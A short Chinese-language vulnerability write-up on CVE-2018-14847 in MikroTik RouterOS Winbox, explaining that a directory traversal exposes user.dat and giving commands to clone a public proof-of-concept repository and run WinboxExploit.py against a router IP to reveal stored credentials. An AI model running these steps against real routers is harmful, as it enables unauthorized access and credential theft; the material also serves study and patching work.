漏洞概述
Winbox是一个小巧的实用程序,允许使用快速简单的GUI管理MikroTik RouterOS。它主要用于管理和配置MikroTik路由器。而RouterOS是由MikroTik开发的操作系统,运行在其路由器和交换机上。
CVE-2018-14847漏洞详情
MikroTik RouterOS 6.42及之前版本存在一个安全漏洞。由于Winbox接口中的目录遍历漏洞,未经认证的远程攻击者可以读取任意文件,而经过认证的远程攻击者可以写入任意文件。
漏洞利用原理
Winbox漏洞的工作原理是通过访问MikroTik设备上的user.dat文件,然后使用extract_user.py解密其中包含的密码,接着使用WinboxExploit.py脚本显示凭据。
漏洞利用步骤
以下是完整的漏洞利用流程:
# 克隆漏洞利用代码仓库
# git clone https://github.com/BasuCert/WinboxPoC
# 进入漏洞利用目录
# cd WinboxPoC
# 执行漏洞利用脚本,<ip router>替换为目标路由器IP地址
# python3 WinboxExploit.py <ip router>
# 实际使用示例
# python3 WinboxExploit.py 192.168.18.187
参考链接
- github.com/BasuCert/Wi…
- www.bssn.go.id/wp-content/…
- cve.mitre.org/cgi-bin/cve… CSD0tFqvECLokhw9aBeRqiFaxebtE89mqyjjzvCX5l27Vn7pcfQD0YOjtLcFRiVdOWo0uPhqxGGBRhtr5fvm1sX075BZOOgJeFLIduGVGkOjwAC2T+2Xdaycoy2kNqi2